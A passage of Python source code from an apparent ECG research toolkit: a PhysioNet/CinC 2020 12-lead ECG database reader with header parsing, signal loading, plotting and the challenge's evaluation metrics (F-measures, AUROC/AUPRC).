rec:str, with_ext:bool=True) -> str: """ finished, checked, get the absolute file path of the header file of `rec` Parameters ---------- rec: str, name of the record with_ext: bool, default True, if True, the returned file path comes with file extension, otherwise without file extension, which is useful for `wfdb` functions Returns ------- fp: str, absolute file path of the header file of the record """ tranche = self._get_tranche(rec) fp = os.path.join(self.db_dirs[tranche], f"{rec}.{self.ann_ext}") if not with_ext: fp = os.path.splitext(fp)[0] return fp def get_ann_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, alias for `get_header_filepath` """ fp = self.get_header_filepath(rec, with_ext=with_ext) return fp def load_data(self, rec:str, leads:Optional[Union[str, List[str]]]=None, data_format:str="channel_first", backend:str="wfdb", units:str="mV", fs:Optional[Real]=None) -> np.ndarray: """ finished, checked, load physical (converted from digital) ecg data, which is more understandable for humans Parameters ---------- rec: str, name of the record leads: str or list of str, optional, the leads to load data_format: str, default "channel_first", format of the ecg data, "channel_last" (alias "lead_last"), or "channel_first" (alias "lead_first") backend: str, default "wfdb", the backend data reader, can also be "scipy" units: str, default "mV", units of the output signal, can also be "μV", with an alias of "uV" fs: real number, optional, if not None, the loaded data will be resampled to this frequency Returns ------- data: ndarray, the ecg data """ assert data_format.lower() in ["channel_first", "lead_first", "channel_last", "lead_last"] tranche = self._get_tranche(rec) if not leads: _leads = self.all_leads elif isinstance(leads, str): _leads = [leads] else: _leads = leads # if tranche in "CD" and fs == 500: # resample will be done at the end of the function # data = self.load_resampled_data(rec) if backend.lower() == "wfdb": rec_fp = self.get_data_filepath(rec, with_ext=False) # p_signal of "lead_last" format wfdb_rec = wfdb.rdrecord(rec_fp, physical=True, channel_names=_leads) data = np.asarray(wfdb_rec.p_signal.T) # lead_units = np.vectorize(lambda s: s.lower())(wfdb_rec.units) elif backend.lower() == "scipy": # loadmat of "lead_first" format rec_fp = self.get_data_filepath(rec, with_ext=True) data = loadmat(rec_fp)["val"] header_info = self.load_ann(rec, raw=False)["df_leads"] baselines = header_info["baseline"].values.reshape(data.shape[0], -1) adc_gain = header_info["adc_gain"].values.reshape(data.shape[0], -1) data = np.asarray(data-baselines) / adc_gain leads_ind = [self.all_leads.index(item) for item in _leads] data = data[leads_ind,:] # lead_units = np.vectorize(lambda s: s.lower())(header_info["df_leads"]["adc_units"].values) else: raise ValueError(f"backend `{backend.lower()}` not supported for loading data") # ref. ISSUES 3, for multiplying `value_correction_factor` # data = data * self.value_correction_factor[tranche] if units.lower() in ["uv", "μv"]: data = data * 1000 if fs is not None and fs != self.fs[tranche]: data = resample_poly(data, fs, self.fs[tranche], axis=1) if data_format.lower() in ["channel_last", "lead_last"]: data = data.T return data def load_ann(self, rec:str, raw:bool=False, backend:str="wfdb") -> Union[dict,str]: """ finished, checked, load annotations (header) stored in the .hea files Parameters ---------- rec: str, name of the record raw: bool, default False, if True, the raw annotations without parsing will be returned backend: str, default "wfdb", case insensitive, if is "wfdb", `wfdb.rdheader` will be used to load the annotations; if is "naive", annotations will be parsed from the lines read from the header files Returns ------- ann_dict, dict or str, the annotations with items: ref. `self.ann_items` """ tranche = self._get_tranche(rec) ann_fp = self.get_ann_filepath(rec, with_ext=True) with open(ann_fp, "r") as f: header_data = f.read().splitlines() if raw: ann_dict = "\n".join(header_data) return ann_dict if backend.lower() == "wfdb": ann_dict = self._load_ann_wfdb(rec, header_data) elif backend.lower() == "naive": ann_dict = self._load_ann_naive(header_data) else: raise ValueError(f"backend `{backend.lower()}` not supported for loading annotations") return ann_dict def _load_ann_wfdb(self, rec:str, header_data:List[str]) -> dict: """ finished, checked, Parameters ---------- rec: str, name of the record header_data: list of str, list of lines read directly from a header file, complementary to data read using `wfdb.rdheader` if applicable, this data will be used, since `datetime` is not well parsed by `wfdb.rdheader` Returns ------- ann_dict, dict, the annotations with items: ref. `self.ann_items` """ header_fp = self.get_header_filepath(rec, with_ext=False) header_reader = wfdb.rdheader(header_fp) ann_dict = {} ann_dict["rec_name"], ann_dict["nb_leads"], ann_dict["fs"], ann_dict["nb_samples"], ann_dict["datetime"], daytime = header_data[0].split(" ") ann_dict["nb_leads"] = int(ann_dict["nb_leads"]) ann_dict["fs"] = int(ann_dict["fs"]) ann_dict["nb_samples"] = int(ann_dict["nb_samples"]) ann_dict["datetime"] = datetime.strptime(" ".join([ann_dict["datetime"], daytime]), "%d-%b-%Y %H:%M:%S") try: # see NOTE. 1. ann_dict["age"] = int([l for l in header_reader.comments if "Age" in l][0].split(": ")[-1]) except: ann_dict["age"] = np.nan try: ann_dict["sex"] = [l for l in header_reader.comments if "Sex" in l][0].split(": ")[-1] except: ann_dict["sex"] = "Unknown" try: ann_dict["medical_prescription"] = [l for l in header_reader.comments if "Rx" in l][0].split(": ")[-1] except: ann_dict["medical_prescription"] = "Unknown" try: ann_dict["history"] = [l for l in header_reader.comments if "Hx" in l][0].split(": ")[-1] except: ann_dict["history"] = "Unknown" try: ann_dict["symptom_or_surgery"] = [l for l in header_reader.comments if "Sx" in l][0].split(": ")[-1] except: ann_dict["symptom_or_surgery"] = "Unknown" l_Dx = [l for l in header_reader.comments if "Dx" in l][0].split(": ")[-1].split(",") ann_dict["diagnosis"], ann_dict["diagnosis_scored"] = self._parse_diagnosis(l_Dx) df_leads = pd.DataFrame() for k in ["file_name", "fmt", "byte_offset", "adc_gain", "units", "adc_res", "adc_zero", "baseline", "init_value", "checksum", "block_size", "sig_name"]: df_leads[k] = header_reader.__dict__[k] df_leads = df_leads.rename( columns={ "sig_name": "lead_name", "units":"adc_units", "file_name":"filename", } ) df_leads.index = df_leads["lead_name"] df_leads.index.name = None ann_dict["df_leads"] = df_leads return ann_dict def _load_ann_naive(self, header_data:List[str]) -> dict: """ finished, checked, load annotations (header) using raw data read directly from a header file Parameters ---------- header_data: list of str, list of lines read directly from a header file Returns ------- ann_dict, dict, the annotations with items: ref. `self.ann_items` """ ann_dict = {} ann_dict["rec_name"], ann_dict["nb_leads"], ann_dict["fs"], ann_dict["nb_samples"], ann_dict["datetime"], daytime = header_data[0].split(" ") ann_dict["nb_leads"] = int(ann_dict["nb_leads"]) ann_dict["fs"] = int(ann_dict["fs"]) ann_dict["nb_samples"] = int(ann_dict["nb_samples"]) ann_dict["datetime"] = datetime.strptime(" ".join([ann_dict["datetime"], daytime]), "%d-%b-%Y %H:%M:%S") try: # see NOTE. 1. ann_dict["age"] = int([l for l in header_data if l.startswith("#Age")][0].split(": ")[-1]) except: ann_dict["age"] = np.nan try: ann_dict["sex"] = [l for l in header_data if l.startswith("#Sex")][0].split(": ")[-1] except: ann_dict["sex"] = "Unknown" try: ann_dict["medical_prescription"] = [l for l in header_data if l.startswith("#Rx")][0].split(": ")[-1] except: ann_dict["medical_prescription"] = "Unknown" try: ann_dict["history"] = [l for l in header_data if l.startswith("#Hx")][0].split(": ")[-1] except: ann_dict["history"] = "Unknown" try: ann_dict["symptom_or_surgery"] = [l for l in header_data if l.startswith("#Sx")][0].split(": ")[-1] except: ann_dict["symptom_or_surgery"] = "Unknown" l_Dx = [l for l in header_data if l.startswith("#Dx")][0].split(": ")[-1].split(",") ann_dict["diagnosis"], ann_dict["diagnosis_scored"] = self._parse_diagnosis(l_Dx) ann_dict["df_leads"] = self._parse_leads(header_data[1:13]) return ann_dict def _parse_diagnosis(self, l_Dx:List[str]) -> Tuple[dict, dict]: """ finished, checked, Parameters ---------- l_Dx: list of str, raw information of diagnosis, read from a header file Returns ------- diag_dict:, dict, diagnosis, including SNOMED CT Codes, fullnames and abbreviations of each diagnosis diag_scored_dict: dict, the scored items in `diag_dict` """ diag_dict, diag_scored_dict = {}, {} try: diag_dict["diagnosis_code"] = [item for item in l_Dx] # selection = dx_mapping_all["SNOMED CT Code"].isin(diag_dict["diagnosis_code"]) # diag_dict["diagnosis_abbr"] = dx_mapping_all[selection]["Abbreviation"].tolist() # diag_dict["diagnosis_fullname"] = dx_mapping_all[selection]["Dx"].tolist() diag_dict["diagnosis_abbr"] = \ [ dx_mapping_all[dx_mapping_all["SNOMED CT Code"]==dc]["Abbreviation"].values[0] \ for dc in diag_dict["diagnosis_code"] ] diag_dict["diagnosis_fullname"] = \ [ dx_mapping_all[dx_mapping_all["SNOMED CT Code"]==dc]["Dx"].values[0] \ for dc in diag_dict["diagnosis_code"] ] scored_indices = np.isin(diag_dict["diagnosis_code"], dx_mapping_scored["SNOMED CT Code"].values) diag_scored_dict["diagnosis_code"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_code"]) \ if scored_indices[idx] ] diag_scored_dict["diagnosis_abbr"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_abbr"]) \ if scored_indices[idx] ] diag_scored_dict["diagnosis_fullname"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_fullname"]) \ if scored_indices[idx] ] except: # the old version, the Dx"s are abbreviations diag_dict["diagnosis_abbr"] = diag_dict["diagnosis_code"] selection = dx_mapping_all["Abbreviation"].isin(diag_dict["diagnosis_abbr"]) diag_dict["diagnosis_fullname"] = dx_mapping_all[selection]["Dx"].tolist() # if not keep_original: # for idx, d in enumerate(ann_dict["diagnosis_abbr"]): # if d in ["Normal", "NSR"]: # ann_dict["diagnosis_abbr"] = ["N"] return diag_dict, diag_scored_dict def _parse_leads(self, l_leads_data:List[str]) -> pd.DataFrame: """ finished, checked, Parameters ---------- l_leads_data: list of str, raw information of each lead, read from a header file Returns ------- df_leads: DataFrame, infomation of each leads in the format of DataFrame """ df_leads = pd.read_csv(io.StringIO("\n".join(l_leads_data)), delim_whitespace=True, header=None) df_leads.columns = ["filename", "fmt+byte_offset", "adc_gain+units", "adc_res", "adc_zero", "init_value", "checksum", "block_size", "lead_name",] df_leads["fmt"] = df_leads["fmt+byte_offset"].apply(lambda s: s.split("+")[0]) df_leads["byte_offset"] = df_leads["fmt+byte_offset"].apply(lambda s: s.split("+")[1]) df_leads["adc_gain"] = df_leads["adc_gain+units"].apply(lambda s: s.split("/")[0]) df_leads["adc_units"] = df_leads["adc_gain+units"].apply(lambda s: s.split("/")[1]) for k in ["byte_offset", "adc_gain", "adc_res", "adc_zero", "init_value", "checksum",]: df_leads[k] = df_leads[k].apply(lambda s: int(s)) df_leads["baseline"] = df_leads["adc_zero"] df_leads = df_leads[["filename", "fmt", "byte_offset", "adc_gain", "adc_units", "adc_res", "adc_zero", "baseline", "init_value", "checksum", "block_size", "lead_name"]] df_leads.index = df_leads["lead_name"] df_leads.index.name = None return df_leads def load_header(self, rec:str, raw:bool=False) -> Union[dict,str]: """ alias for `load_ann`, as annotations are also stored in header files """ return self.load_ann(rec, raw) def get_labels(self, rec:str, scored_only:bool=True, fmt:str="s", normalize:bool=True) -> List[str]: """ finished, checked, read labels (diagnoses or arrhythmias) of a record Parameters ---------- rec: str, name of the record scored_only: bool, default True, only get the labels that are scored in the CINC2020 official phase fmt: str, default "a", the format of labels, one of the following (case insensitive): - "a", abbreviations - "f", full names - "s", SNOMED CT Code normalize: bool, default True, if True, the labels will be transformed into their equavalents, which are defined in `utils.utils_misc.cinc2020_aux_data.py` Returns ------- labels, list, the list of labels """ ann_dict = self.load_ann(rec) if scored_only: labels = ann_dict["diagnosis_scored"] else: labels = ann_dict["diagnosis"] if fmt.lower() == "a": labels = labels["diagnosis_abbr"] elif fmt.lower() == "f": labels = labels["diagnosis_fullname"] elif fmt.lower() == "s": labels = labels["diagnosis_code"] else: raise ValueError(f"`fmt` should be one of `a`, `f`, `s`, but got `{fmt}`") if normalize: labels = [self.label_trans_dict.get(item, item) for item in labels] return labels def get_fs(self, rec:str) -> Real: """ finished, checked, get the sampling frequency of a record Parameters ---------- rec: str, name of the record Returns ------- fs: real number, sampling frequency of the record `rec` """ tranche = self._get_tranche(rec) fs = self.fs[tranche] return fs def get_subject_info(self, rec:str, items:Optional[List[str]]=None) -> dict: """ finished, checked, read auxiliary information of a subject (a record) stored in the header files Parameters ---------- rec: str, name of the record items: list of str, optional, items of the subject's information (e.g. sex, age, etc.) Returns ------- subject_info: dict, information about the subject, including "age", "sex", "medical_prescription", "history", "symptom_or_surgery", """ if items is None or len(items) == 0: info_items = [ "age", "sex", "medical_prescription", "history", "symptom_or_surgery", ] else: info_items = items ann_dict = self.load_ann(rec) subject_info = [ann_dict[item] for item in info_items] return subject_info def save_challenge_predictions(self, rec:str, output_dir:str, scores:List[Real], labels:List[int], classes:List[str]) -> NoReturn: """ NOT finished, NOT checked, need updating, TODO: update for the official phase Parameters ---------- rec: str, name of the record output_dir: str, directory to save the predictions scores: list of real, raw predictions labels: list of int, 0 or 1, binary predictions classes: list of str, SNOMED CT Code of binary predictions """ new_file = f"{rec}.csv" output_file = os.path.join(output_dir, new_file) # Include the filename as the recording number recording_string = f"#{rec}" class_string = ",".join(classes) label_string = ",".join(str(i) for i in labels) score_string = ",".join(str(i) for i in scores) with open(output_file, "w") as f: # f.write(recording_string + "\n" + class_string + "\n" + label_string + "\n" + score_string + "\n") f.write("\n".join([recording_string, class_string, label_string, score_string, ""])) def plot(self, rec:str, data:Optional[np.ndarray]=None, ann:Optional[Dict[str, np.ndarray]]=None, ticks_granularity:int=0, leads:Optional[Union[str, List[str]]]=None, same_range:bool=False, waves:Optional[Dict[str, Sequence[int]]]=None, **kwargs:Any) -> NoReturn: """ finished, checked, to improve, plot the signals of a record or external signals (units in μV), with metadata (fs, labels, tranche, etc.), possibly also along with wave delineations Parameters ---------- rec: str, name of the record data: ndarray, optional, (12-lead) ecg signal to plot, should be of the format "channel_first", and compatible with `leads` if given, data of `rec` will not be used, this is useful when plotting filtered data ann: dict, optional, annotations for `data`, with 2 items: "scored", "all", ignored if `data` is None ticks_granularity: int, default 0, the granularity to plot axis ticks, the higher the more, 0 (no ticks) --> 1 (major ticks) --> 2 (major + minor ticks) leads: str or list of str, optional, the leads to plot same_range: bool, default False, if True, forces all leads to have the same y range waves: dict, optional, indices of the wave critical points, including "p_onsets", "p_peaks", "p_offsets", "q_onsets", "q_peaks", "r_peaks", "s_peaks", "s_offsets", "t_onsets", "t_peaks", "t_offsets" kwargs: dict, TODO ---- 1. slice too long records, and plot separately for each segment 2. plot waves using `axvspan` NOTE ---- `Locator` of `plt` has default `MAXTICKS` equal to 1000, if not modifying this number, at most 40 seconds of signal could be plotted once Contributors: Jeethan, and WEN Hao """ tranche = self._get_tranche(rec) if tranche in "CDE": physionet_lightwave_suffix = CFG({ "C": "incartdb/1.0.0", "D": "ptbdb/1.0.0", "E": "ptb-xl/1.0.1", }) url = f"https://physionet.org/lightwave/?db={physionet_lightwave_suffix[tranche]}" print(f"better view: {url}") if "plt" not in dir(): import matplotlib.pyplot as plt plt.MultipleLocator.MAXTICKS = 3000 if leads is None or leads == "all": _leads = self.all_leads elif isinstance(leads, str): _leads = [leads] else: _leads = leads # assert all([l in self.all_leads for l in _leads]) assert set(_leads).issubset(self._all_leads_set) # lead_list = self.load_ann(rec)["df_leads"]["lead_name"].tolist() # lead_indices = [lead_list.index(l) for l in _leads] lead_indices = [self.all_leads.index(l) for l in _leads] if data is None: _data = self.load_data(rec, data_format="channel_first", units="μV")[lead_indices] else: units = self._auto_infer_units(data) print(f"input data is auto detected to have units in {units}") if units.lower() == "mv": _data = 1000 * data else: _data = data assert _data.shape[0] == len(_leads), \ f"number of leads from data of shape ({_data.shape[0]}) does not match the length ({len(_leads)}) of `leads`" if same_range: y_ranges = np.ones((_data.shape[0],)) * np.max(np.abs(_data)) + 100 else: y_ranges = np.max(np.abs(_data), axis=1) + 100 if waves: if waves.get("p_onsets", None) and waves.get("p_offsets", None): p_waves = [ [onset, offset] \ for onset, offset in zip(waves["p_onsets"], waves["p_offsets"]) ] elif waves.get("p_peaks", None): p_waves = [ [ max(0, p + ms2samples(PlotCfg.p_onset, fs=self.get_fs(rec))), min(_data.shape[1], p + ms2samples(PlotCfg.p_offset, fs=self.get_fs(rec))) ] for p in waves["p_peaks"] ] else: p_waves = [] if waves.get("q_onsets", None) and waves.get("s_offsets", None): qrs = [ [onset, offset] for onset, offset in zip(waves["q_onsets"], waves["s_offsets"]) ] elif waves.get("q_peaks", None) and waves.get("s_peaks", None): qrs = [ [ max(0, q + ms2samples(PlotCfg.q_onset, fs=self.get_fs(rec))), min(_data.shape[1], s + ms2samples(PlotCfg.s_offset, fs=self.get_fs(rec))) ] for q,s in zip(waves["q_peaks"], waves["s_peaks"]) ] elif waves.get("r_peaks", None): qrs = [ [ max(0, r + ms2samples(PlotCfg.qrs_radius, fs=self.get_fs(rec))), min(_data.shape[1], r + ms2samples(PlotCfg.qrs_radius, fs=self.get_fs(rec))) ] for r in waves["r_peaks"] ] else: qrs = [] if waves.get("t_onsets", None) and waves.get("t_offsets", None): t_waves = [ [onset, offset] for onset, offset in zip(waves["t_onsets"], waves["t_offsets"]) ] elif waves.get("t_peaks", None): t_waves = [ [ max(0, t + ms2samples(PlotCfg.t_onset, fs=self.get_fs(rec))), min(_data.shape[1], t + ms2samples(PlotCfg.t_offset, fs=self.get_fs(rec))) ] for t in waves["t_peaks"] ] else: t_waves = [] else: p_waves, qrs, t_waves = [], [], [] palette = {"p_waves": "green", "qrs": "red", "t_waves": "pink",} plot_alpha = 0.4 if ann is None or data is None: diag_scored = self.get_labels(rec, scored_only=True, fmt="a") diag_all = self.get_labels(rec, scored_only=False, fmt="a") else: diag_scored = ann["scored"] diag_all = ann["all"] nb_leads = len(_leads) seg_len = self.fs[tranche] * 25 # 25 seconds nb_segs = _data.shape[1] // seg_len t = np.arange(_data.shape[1]) / self.fs[tranche] duration = len(t) / self.fs[tranche] fig_sz_w = int(round(DEFAULT_FIG_SIZE_PER_SEC * duration)) fig_sz_h = 6 * np.maximum(y_ranges, 750) / 1500 fig, axes = plt.subplots(nb_leads, 1, sharex=False, figsize=(fig_sz_w, np.sum(fig_sz_h))) if nb_leads == 1: axes = [axes] for idx in range(nb_leads): axes[idx].plot(t, _data[idx], color="black", linewidth="2.0", label=f"lead - {_leads[idx]}") axes[idx].axhline(y=0, linestyle="-", linewidth="1.0", color="red") # NOTE that `Locator` has default `MAXTICKS` equal to 1000 if ticks_granularity >= 1: axes[idx].xaxis.set_major_locator(plt.MultipleLocator(0.2)) axes[idx].yaxis.set_major_locator(plt.MultipleLocator(500)) axes[idx].grid(which="major", linestyle="-", linewidth="0.4", color="red") if ticks_granularity >= 2: axes[idx].xaxis.set_minor_locator(plt.MultipleLocator(0.04)) axes[idx].yaxis.set_minor_locator(plt.MultipleLocator(100)) axes[idx].grid(which="minor", linestyle=":", linewidth="0.2", color="gray") # add extra info. to legend # https://stackoverflow.com/questions/16826711/is-it-possible-to-add-a-string-as-a-legend-item-in-matplotlib axes[idx].plot([], [], " ", label=f"labels_s - {",".join(diag_scored)}") axes[idx].plot([], [], " ", label=f"labels_a - {",".join(diag_all)}") axes[idx].plot([], [], " ", label=f"tranche - {self.tranche_names[tranche]}") axes[idx].plot([], [], " ", label=f"fs - {self.fs[tranche]}") for w in ["p_waves", "qrs", "t_waves"]: for itv in eval(w): axes[idx].axvspan(itv[0], itv[1], color=palette[w], alpha=plot_alpha) axes[idx].legend(loc="upper left", fontsize=14) axes[idx].set_xlim(t[0], t[-1]) axes[idx].set_ylim(min(-600, -y_ranges[idx]), max(600, y_ranges[idx])) axes[idx].set_xlabel("Time [s]", fontsize=16) axes[idx].set_ylabel("Voltage [μV]", fontsize=16) plt.subplots_adjust(hspace=0.05) fig.tight_layout() if kwargs.get("save_path", None): plt.savefig(kwargs["save_path"], dpi=200, bbox_inches="tight") else: plt.show() def get_tranche_class_distribution(self, tranches:Sequence[str], scored_only:bool=True) -> Dict[str, int]: """ finished, checked, Parameters ---------- tranches: sequence of str, tranche symbols (A-F) scored_only: bool, default True, only get class distributions that are scored in the CINC2020 official phase Returns ------- distribution: dict, keys are abbrevations of the classes, values are appearance of corr. classes in the tranche. """ tranche_names = [self.tranche_names[t] for t in tranches] df = dx_mapping_scored if scored_only else dx_mapping_all distribution = CFG() for _, row in df.iterrows(): num = (row[[tranche_names]].values).sum() if num > 0: distribution[row["Abbreviation"]] = num return distribution @staticmethod def get_arrhythmia_knowledge(arrhythmias:Union[str,List[str]], **kwargs) -> NoReturn: """ finished, checked, knowledge about ECG features of specific arrhythmias, Parameters ---------- arrhythmias: str, or list of str, the arrhythmia(s) to check, in abbreviations or in SNOMED CT Code """ if isinstance(arrhythmias, str): d = [normalize_class(arrhythmias)] else: d = [normalize_class(c) for c in arrhythmias] # pp = pprint.PrettyPrinter(indent=4) # unsupported = [item for item in d if item not in dx_mapping_all["Abbreviation"]] unsupported = [item for item in d if item not in dx_mapping_scored["Abbreviation"].values] assert len(unsupported) == 0, \ f"`{unsupported}` {"is" if len(unsupported)==1 else "are"} not supported!" for idx, item in enumerate(d): # pp.pprint(eval(f"EAK.{item}")) print(dict_to_str(eval(f"EAK.{item}"))) if idx < len(d)-1: print("*"*110) def load_resampled_data(self, rec:str, data_format:str="channel_first", siglen:Optional[int]=None) -> np.ndarray: """ finished, checked, resample the data of `rec` to 500Hz, or load the resampled data in 500Hz, if the corr. data file already exists Parameters ---------- rec: str, name of the record data_format: str, default "channel_first", format of the ecg data, "channel_last" (alias "lead_last"), or "channel_first" (alias "lead_first") siglen: int, optional, signal length, units in number of samples, if set, signal with length longer will be sliced to the length of `siglen` used for example when preparing/doing model training Returns ------- data: ndarray, the resampled (and perhaps sliced) signal data """ tranche = self._get_tranche(rec) if siglen is None: rec_fp = os.path.join(self.db_dirs[tranche], f"{rec}_500Hz.npy") else: rec_fp = os.path.join(self.db_dirs[tranche], f"{rec}_500Hz_siglen_{siglen}.npy") if not os.path.isfile(rec_fp): # print(f"corresponding file {os.basename(rec_fp)} does not exist") data = self.load_data(rec, data_format="channel_first", units="mV", fs=None) if self.fs[tranche] != 500: data = resample_poly(data, 500, self.fs[tranche], axis=1) if siglen is not None and data.shape[1] >= siglen: # slice_start = (data.shape[1] - siglen)//2 # slice_end = slice_start + siglen # data = data[..., slice_start:slice_end] data = ensure_siglen(data, siglen=siglen, fmt="channel_first") np.save(rec_fp, data) elif siglen is None: np.save(rec_fp, data) else: # print(f"loading from local file...") data = np.load(rec_fp) if data_format.lower() in ["channel_last", "lead_last"]: data = data.T return data def load_raw_data(self, rec:str, backend:str="scipy") -> np.ndarray: """ finished, checked, load raw data from corresponding files with no further processing, in order to facilitate feeding data into the `run_12ECG_classifier` function Parameters ---------- rec: str, name of the record backend: str, default "scipy", the backend data reader, can also be "wfdb", note that "scipy" provides data in the format of "lead_first", while "wfdb" provides data in the format of "lead_last", Returns ------- raw_data: ndarray, raw data (d_signal) loaded from corresponding data file, without subtracting baseline nor dividing adc gain """ tranche = self._get_tranche(rec) if backend.lower() == "wfdb": rec_fp = self.get_data_filepath(rec, with_ext=False) wfdb_rec = wfdb.rdrecord(rec_fp, physical=False) raw_data = np.asarray(wfdb_rec.d_signal) elif backend.lower() == "scipy": rec_fp = self.get_data_filepath(rec, with_ext=True) raw_data = loadmat(rec_fp)["val"] return raw_data def _check_nan(self, tranches:Union[str, Sequence[str]]) -> NoReturn: """ finished, checked, check if records from `tranches` has nan values accessing data using `p_signal` of `wfdb` would produce nan values, if exceptionally large values are encountered, this could help detect abnormal records as well Parameters ---------- tranches: str or sequence of str, tranches to check """ for t in tranches: for rec in self.all_records[t]: data = self.load_data(rec) if np.isnan(data).any(): print(f"record {rec} from tranche {t} has nan values") from ..aux_data.cinc2020_aux_data import load_weights def compute_all_metrics(classes:List[str], truth:Sequence, binary_pred:Sequence, scalar_pred:Sequence) -> Tuple[float]: """ finished, checked, Parameters ---------- classes: list of str, list of all the classes, in the format of abbrevations truth: sequence, ground truth array, of shape (n_records, n_classes), with values 0 or 1 binary_pred: sequence, binary predictions, of shape (n_records, n_classes), with values 0 or 1 scalar_pred: sequence, probability predictions, of shape (n_records, n_classes), with values within [0,1] Returns ------- auroc: float, auprc: float, accuracy: float, f_measure: float, f_beta_measure: float, g_beta_measure: float, challenge_metric: float, """ # normal_class = "426783006" normal_class = "NSR" # equivalent_classes = [["713427006", "59118001"], ["284470004", "63593006"], ["427172004", "17338001"]] weights = load_weights(classes=classes) _truth = np.array(truth) _binary_pred = np.array(binary_pred) _scalar_pred = np.array(scalar_pred) print("- AUROC and AUPRC...") auroc, auprc = compute_auc(_truth, _scalar_pred) print("- Accuracy...") accuracy = compute_accuracy(_truth, _binary_pred) print("- F-measure...") f_measure = compute_f_measure(_truth, _binary_pred) print("- F-beta and G-beta measures...") f_beta_measure, g_beta_measure = compute_beta_measures(_truth, _binary_pred, beta=2) print("- Challenge metric...") challenge_metric = compute_challenge_metric(weights, _truth, _binary_pred, classes, normal_class) print("Done.") # Return the results. return auroc, auprc, accuracy, f_measure, f_beta_measure, g_beta_measure, challenge_metric # Compute recording-wise accuracy. def compute_accuracy(labels:np.ndarray, outputs:np.ndarray) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) num_correct_recordings = 0 for i in range(num_recordings): if np.all(labels[i, :]==outputs[i, :]): num_correct_recordings += 1 return float(num_correct_recordings) / float(num_recordings) # Compute confusion matrices. def compute_confusion_matrices(labels:np.ndarray, outputs:np.ndarray, normalize:bool=False) -> np.ndarray: """ checked, """ # Compute a binary confusion matrix for each class k: # # [TN_k FN_k] # [FP_k TP_k] # # If the normalize variable is set to true, then normalize the contributions # to the confusion matrix by the number of labels per recording. num_recordings, num_classes = np.shape(labels) if not normalize: A = np.zeros((num_classes, 2, 2)) for i in range(num_recordings): for j in range(num_classes): if labels[i, j]==1 and outputs[i, j]==1: # TP A[j, 1, 1] += 1 elif labels[i, j]==0 and outputs[i, j]==1: # FP A[j, 1, 0] += 1 elif labels[i, j]==1 and outputs[i, j]==0: # FN A[j, 0, 1] += 1 elif labels[i, j]==0 and outputs[i, j]==0: # TN A[j, 0, 0] += 1 else: # This condition should not happen. raise ValueError("Error in computing the confusion matrix.") else: A = np.zeros((num_classes, 2, 2)) for i in range(num_recordings): normalization = float(max(np.sum(labels[i, :]), 1)) for j in range(num_classes): if labels[i, j]==1 and outputs[i, j]==1: # TP A[j, 1, 1] += 1.0/normalization elif labels[i, j]==0 and outputs[i, j]==1: # FP A[j, 1, 0] += 1.0/normalization elif labels[i, j]==1 and outputs[i, j]==0: # FN A[j, 0, 1] += 1.0/normalization elif labels[i, j]==0 and outputs[i, j]==0: # TN A[j, 0, 0] += 1.0/normalization else: # This condition should not happen. raise ValueError("Error in computing the confusion matrix.") return A # Compute macro F-measure. def compute_f_measure(labels:np.ndarray, outputs:np.ndarray) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) A = compute_confusion_matrices(labels, outputs) f_measure = np.zeros(num_classes) for k in range(num_classes): tp, fp, fn, tn = A[k, 1, 1], A[k, 1, 0], A[k, 0, 1], A[k, 0, 0] if 2 * tp + fp + fn: f_measure[k] = float(2 * tp) / float(2 * tp + fp + fn) else: f_measure[k] = float("nan") macro_f_measure = np.nanmean(f_measure) return macro_f_measure # Compute F-beta and G-beta measures from the unofficial phase of the Challenge. def compute_beta_measures(labels:np.ndarray, outputs:np.ndarray, beta:Real) -> Tuple[float, float]: """ checked, """ num_recordings, num_classes = np.shape(labels) A = compute_confusion_matrices(labels, outputs, normalize=True) f_beta_measure = np.zeros(num_classes) g_beta_measure = np.zeros(num_classes) for k in range(num_classes): tp, fp, fn, tn = A[k, 1, 1], A[k, 1, 0], A[k, 0, 1], A[k, 0, 0] if (1+beta**2)*tp + fp + beta**2*fn: f_beta_measure[k] = float((1+beta**2)*tp) / float((1+beta**2)*tp + fp + beta**2*fn) else: f_beta_measure[k] = float("nan") if tp + fp + beta*fn: g_beta_measure[k] = float(tp) / float(tp + fp + beta*fn) else: g_beta_measure[k] = float("nan") macro_f_beta_measure = np.nanmean(f_beta_measure) macro_g_beta_measure = np.nanmean(g_beta_measure) return macro_f_beta_measure, macro_g_beta_measure # Compute macro AUROC and macro AUPRC. def compute_auc(labels:np.ndarray, outputs:np.ndarray) -> Tuple[float, float]: """ checked, """ num_recordings, num_classes = np.shape(labels) # Compute and summarize the confusion matrices for each class across at distinct output values. auroc = np.zeros(num_classes) auprc = np.zeros(num_classes) for k in range(num_classes): # We only need to compute TPs, FPs, FNs, and TNs at distinct output values. thresholds = np.unique(outputs[:, k]) thresholds = np.append(thresholds, thresholds[-1]+1) thresholds = thresholds[::-1] num_thresholds = len(thresholds) # Initialize the TPs, FPs, FNs, and TNs. tp = np.zeros(num_thresholds) fp = np.zeros(num_thresholds) fn = np.zeros(num_thresholds) tn = np.zeros(num_thresholds) fn[0] = np.sum(labels[:, k]==1) tn[0] = np.sum(labels[:, k]==0) # Find the indices that result in sorted output values. idx = np.argsort(outputs[:, k])[::-1] # Compute the TPs, FPs, FNs, and TNs for class k across thresholds. i = 0 for j in range(1, num_thresholds): # Initialize TPs, FPs, FNs, and TNs using values at previous threshold. tp[j] = tp[j-1] fp[j] = fp[j-1] fn[j] = fn[j-1] tn[j] = tn[j-1] # Update the TPs, FPs, FNs, and TNs at i-th output value. while i < num_recordings and outputs[idx[i], k] >= thresholds[j]: if labels[idx[i], k]: tp[j] += 1 fn[j] -= 1 else: fp[j] += 1 tn[j] -= 1 i += 1 # Summarize the TPs, FPs, FNs, and TNs for class k. tpr = np.zeros(num_thresholds) tnr = np.zeros(num_thresholds) ppv = np.zeros(num_thresholds) for j in range(num_thresholds): if tp[j] + fn[j]: tpr[j] = float(tp[j]) / float(tp[j] + fn[j]) else: tpr[j] = float("nan") if fp[j] + tn[j]: tnr[j] = float(tn[j]) / float(fp[j] + tn[j]) else: tnr[j] = float("nan") if tp[j] + fp[j]: ppv[j] = float(tp[j]) / float(tp[j] + fp[j]) else: ppv[j] = float("nan") # Compute AUROC as the area under a piecewise linear function with TPR/ # sensitivity (x-axis) and TNR/specificity (y-axis) and AUPRC as the area # under a 